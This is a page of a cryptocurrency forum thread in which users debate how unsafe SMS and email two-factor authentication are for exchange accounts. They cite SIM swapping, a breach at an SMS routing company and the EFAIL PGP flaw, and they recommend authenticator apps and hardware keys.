Pages:
Author

Topic: For All Of You That Still Think SMS For 2FA For Wallets Is Or Was Safe. - page 2. (Read 401 times)

legendary
Activity: 2912
Merit: 6403
Blackjack.fun
2FA should be mandatory on all your online accounts which hold anything sensitive or valuable, especially any accounts holding bitcoin. But that 2FA should never be either SMS or email based. As we've seen, SMS messages are sent unencrypted through an unknown number of intermediaries before they reach you, can be intercepted at any point along the way, and your phone number can easily be transferred to an attacker with a SIM swap attack.

Intercepting is one thing, matching it with the account in question is a different thing altogether for a service that receives hundreds of logins per minute and routes them through different providers like the large exchanges or banks, you are simply looking at a list and lists of codes, you need to also know the phone number of the victim, the password, the login. Of course, SMS 2FA is not really the best choice but it's way better than nothing, and let's be clear, at this point, there is only speculation that hackers had access to the content of the messages, one random source that said the hackers could have gained access, not that they did.

Others have taken this to another level, my bank asks for a security pin every time I change the IP from which I log in, even for the app, that one can't be changed and the option can't be removed unless you go to a physical bank and submit a request, unlike the 6 numbers 2FA that is used only to validate transactions.
hero member
Activity: 924
Merit: 5943
not your keys, not your coins!
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either Grin

Exchanges, use 2fa all the time. Some use Google or similar many use SMS.
And even if you live by the don't leave your coins on an exchange idea. If you do want to move fiat in and out or do trading, you are going to one sooner or later.
Ahh right, so with 2FA for wallets, you mean 2FA for exchanges. I didn't know they still allow to use SMS for 2FA, that's really bad, and should not be changed today, it should have been changed actually years ago!

On top of that, no matter how you look at it, it's really surprising that the fact that a hack of this magnitude went on for so long and nobody is really talking about it.
I agree, most people are more worried about Facebook being down for a few hours than their 2FA setups Cheesy
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either Grin

Exchanges, use 2fa all the time. Some use Google or similar many use SMS.
And even if you live by the don't leave your coins on an exchange idea. If you do want to move fiat in and out or do trading, you are going to one sooner or later.

On top of that, no matter how you look at it, it's really surprising that the fact that a hack of this magnitude went on for so long and nobody is really talking about it.

-Dave
legendary
Activity: 2730
Merit: 7065
I have also read back in 2018 that there was something wrong with PGP and it was crackable. Can't claim the actual title to be fair but remember that the article was stating that PGP isn't safe option.
I guess you read something about the EFAIL vulnerability like it's explained in this article.

According to the article, it is possible to decrypt a PGP encrypted email if it gets intercepted or stolen from a computer or a server. But to do that, a custom HTML modification would need to be inserted in the encrypted email before it gets sent back to the attacker. If performed successfully, this tricks the email software to send back an unencrypted version of the encrypted email back to the attackers. The problem lies in the email clients, and not directly in PGP. The article mentions Outlook and Thunderbird as two email clients vulnerable to this type of attack. At least they were back in 2018.   

The article suggests a mitigation technique. Disable HTML rendering in your email software.
hero member
Activity: 924
Merit: 5943
not your keys, not your coins!
Oh, well, SMS based 2FA should not be used anyway. I was under the assumption that it's insecure and not to be used for years.
If you use something like FIDO U2F your chances are better.
However, no system is 100% secure, and almost everything will probably be hacked sooner or later. Even with a perfectly secure cryptosystem, you'll have flaws in the implementation for example.
I don't see how 2FA is used in a wallet though. Would this be for online wallets? Because those shouldn't be used in the first place either Grin
legendary
Activity: 2268
Merit: 18771
It's not 100% safe and that has been proven but that doesn't mean that it's not better than nothing.
It actually might mean it's not better than nothing. In the case of the recent Coinbase hack, due to an vulnerability in their SMS system, attackers which could intercept users' SMS message (which we know is very easy to do) were able to gain access to their Coinbase accounts and steal all their coins.

2FA is better than nothing, if someone hacks our account
2FA should be mandatory on all your online accounts which hold anything sensitive or valuable, especially any accounts holding bitcoin. But that 2FA should never be either SMS or email based. As we've seen, SMS messages are sent unencrypted through an unknown number of intermediaries before they reach you, can be intercepted at any point along the way, and your phone number can easily be transferred to an attacker with a SIM swap attack. Email also isn't secure, as if someone compromises your email account then they can both reset your exchange account password and receive any 2FA email, meaning both your factors have the same single point of failure. 2FA should be at a minimum a 2FA app, preferably on a phone you never use to access the accounts in question (since again, if an attacker unlocks your phone, they can log in to your account through the saved credentials and access the relevant 2FA code, meaning both your factors have the same single point of failure). The best option is to use a hardware key such as a yubikey. Some hardware wallets also offer this function.
legendary
Activity: 3472
Merit: 10611
Can't claim the actual title to be fair but remember that the article was stating that PGP isn't safe option.
Interesting but in my experience these insecurities almost always related to the implementation of the algorithm not the algorithm itself. Otherwise the underlying cryptography is secure, it is using RSA and ECC and the last one is basically what we are using in bitcoin too and is secure when used correctly (choose secure EC curve, a strong hash algorithm, etc.).
HCP
legendary
Activity: 2086
Merit: 4363
Sim swapping has been an issue forever. Undecided

It still bothers me that there are services that insist of using either email or SMS as part of a 2FA system, as they're so easily exploitable. I really wish more services would use TOTP as standard. While not perfect, they are much better than email or SMS.
legendary
Activity: 1134
Merit: 1599
Let's not even mention those "hacks" done with the actual help of carriers by replacing the real owner's SIM card with a perpetrator's new one as well. SIMs are never safe. I think that anything going through a centralized method is going to have a flaw found sooner or later. Just the fact that those carriers know your 2FA before actually sending it to you is scary enough. Use offline as much as possible for security, and by offline I mean anything that sits only in your local storage and never communicates with external servers/satellites/whatever.
hero member
Activity: 2352
Merit: 905
Metawin.com - Truly the best casino ever
It's not 100% safe and that has been proven but that doesn't mean that it's not better than nothing. I have also read back in 2018 that there was something wrong with PGP and it was crackable. Can't claim the actual title to be fair but remember that the article was stating that PGP isn't safe option.
We live in the era of IT and still we are new in it, it's full of surprises and will even be!

That's not the end! Can you remember how secure houses were decades ago? And can you remind how secure they are right now? There is a huge difference, right? At past you could burn any house, right now elite houses have superior protections. Again, it's not the end! Very sad but what's done, is done. 2FA is better than nothing, if someone hacks our account, I hugely, hugely doubt that that will be a person who had access on that company's database.
sr. member
Activity: 280
Merit: 253
Signal for messages. Doesn't protect your wallet, though. This is proof that 2FA is just annoying.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
It never was. And no matter how much you want to think otherwise YOU were probably part of this breach.
That's correct, billions of messages over 5 years.

https://www.vice.com/en/article/z3xpm8/company-that-routes-billions-of-text-messages-quietly-says-it-was-hacked

Quote
The company wrote that it discovered the breach in May 2021, but that the hack began in May of 2016.

Go ahead, send nudes to your partner. I'll just download them and look at them later. I am busy taking some money out of your accounts at the moment.

-Dave

Pages:
Jump to: